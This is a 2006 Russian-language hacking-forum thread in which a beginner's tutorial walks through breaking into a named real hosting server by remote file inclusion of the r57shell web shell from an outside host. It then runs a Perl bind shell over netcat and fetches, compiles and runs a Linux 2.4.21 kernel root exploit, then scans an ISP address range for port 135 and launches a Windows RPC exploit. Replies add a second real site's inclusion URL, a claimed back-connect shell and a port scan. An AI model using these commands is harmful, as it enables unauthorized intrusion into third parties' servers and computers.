Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Взлом сервера, и проникновение на удалённый компьютер (https://forum.antichat.xyz/showthread.php?t=15466)

D1mOn 05.03.2006 15:00

Взлом сервера, и проникновение на удалённый компьютер
 
Сразу оговорюсь эта статья исключительно для новичков, и для тех кто с этим никогда раньше не сталкивался!

Всё скрипты и программы искользуемые в статье качаем отсюда:
http://d1m0n.jino-net.ru/root.rar

В этой статье я расскажу как можно получить рута на сервере с уязвимым ядром Linux 2.4.21, а так же как через этот сервер можно проникнуть на удалённый компьютер через 135 порт. Итак начнём.

Действие первое:

Получаем рута на сервере.
Я нашёл хостинг _http://i2dhost.com с распространённой уязвимостью. Воспользуемся этой уязвимостью:
Код:

i2dhost.com/hostadmin/?path=http://rst.void.ru/download/r57shell.txt?
Тээкс мы зашли в шелл. Изменим рабочую дерикторию на /tmp. Сделали ? Идём далее. Теперь нам надо открыть порт чтобы законектиться к серверу через прогу netcat. Воспользуемя бинд шеллом который откроет нам 32762 порт. Заливаем бинд шелл со своего компьютера (это легко делается при помощи r57shell). Так бинд шелл залили, теперь надо его запустить командой:
Код:

perl bind_port.pl
Сделали. Теперь запускаем программу netcat и вписываем туда i2dhost.com 32762. Набираем ls -la, и вот перед нами список файлов в директории /tmp. Следующим шагом будет заливка и компиляция скрипта который и даст нам рута.
В netcat набираем
Код:

wget http://packetstormsecurity.org/0312-exploits/hatorihanzo.c
Ждём пару секунд. Всё загрузилось? Теперь компилируем командой:
Код:

gcc -o hatorihanzo hatorihanzo.c -static
Скомпилировали. Теперь запускаем командой
Код:

./hatorihanzo
Теперь набираем команду id и видим
Код:

uid=0|root|  gid=0|root|
Все теперь на сервере у нас права root.

Действие второе:

Проникаем на удалённый компьютер.
Сначала ище компьютеры с открытым 135 портом. Я это делал при помощи XSpider'a. Вбиваем диапазон ip адресов своего прова у меня это 82.179.80.1 - 82.179.82.255. Запускаем сканер. И он ищет все компы, и показывает их открытые порты. У меня он из 40 компов нашёл 17 с открытым 135 портом. Далее заливаем скрипт expl.c на порутаный нами сервак. Компилируем его командой
Код:

gcc -o expl expl.c
Теперь запускаем командой:
Код:

./expl
Ну а там уже разобраться не трудно)
Так же оговорюсь что для выполнения второго действия права root не обязательны.
Ну вот и всё. Спасибо за внимание.

Rebz 05.03.2006 15:12

статья гм.. нормальная.. но для новичком слишком много неясного.. действия отписаны не детельно, т.е. не очень подробно.. имхо). А так молодец)

Nasfiratus 07.03.2006 09:47

Респект! Вот только не на каждый сервер можно залить что либо... к примеру у меня на ни на какой сервер не заливается бин порта...

k1b0rg 07.03.2006 10:13

гм, статья ваще не ясная, лично нихрена не понял, ну нельзя было разжевать а?

Nasfiratus 07.03.2006 10:39

gcc команда не работает че делать???

D1mOn 07.03.2006 10:48

Цитата:

гм, статья ваще не ясная, лично нихрена не понял, ну нельзя было разжевать а?
Ок, без проблем, перепишу статью, и напишу всё подробнейшим образом))

Dronga 07.03.2006 11:22

А зачем вообще порт было биндить?? Помоему и без этого можно было сплоит и скачать и запустить...

k1b0rg 07.03.2006 11:52

2dronga можно и не биндить, но на терминале удобней, да и еще я посмотрю как ты на веб шелле запустишь mc

rent0n 07.03.2006 14:34

Цитата:

Сообщение от Nasfiratus
http://www.successteam1.com/order/?p.../r57shell.txt?

вот =)

Уже залил бэк конект и все такое... не компилит поднятие до рута... =(

там ядро 2.6.14. Что-то мне подсказывает, что рута ты там не получишь. Поищи чего-нибудь попроще, типа 2.4.21.

rent0n 07.03.2006 14:41

Цитата:

Сообщение от Dronga
А зачем вообще порт было биндить?? Помоему и без этого можно было сплоит и скачать и запустить...

Если не секрет, что за эксплоит для 2.6.14? Если только на демоны
21/tcp open ftp PureFTPd
22/tcp open ssh OpenSSH 3.6.1p2 (protocol 1.99)
23/tcp open|filtered telnet
25/tcp open smtp Exim smtpd 4.52
53/tcp open domain ISC Bind 9.2.3
80/tcp open http Apache httpd 1.3.33
110/tcp open pop3 cppop pop3d 20.0


Время: 19:45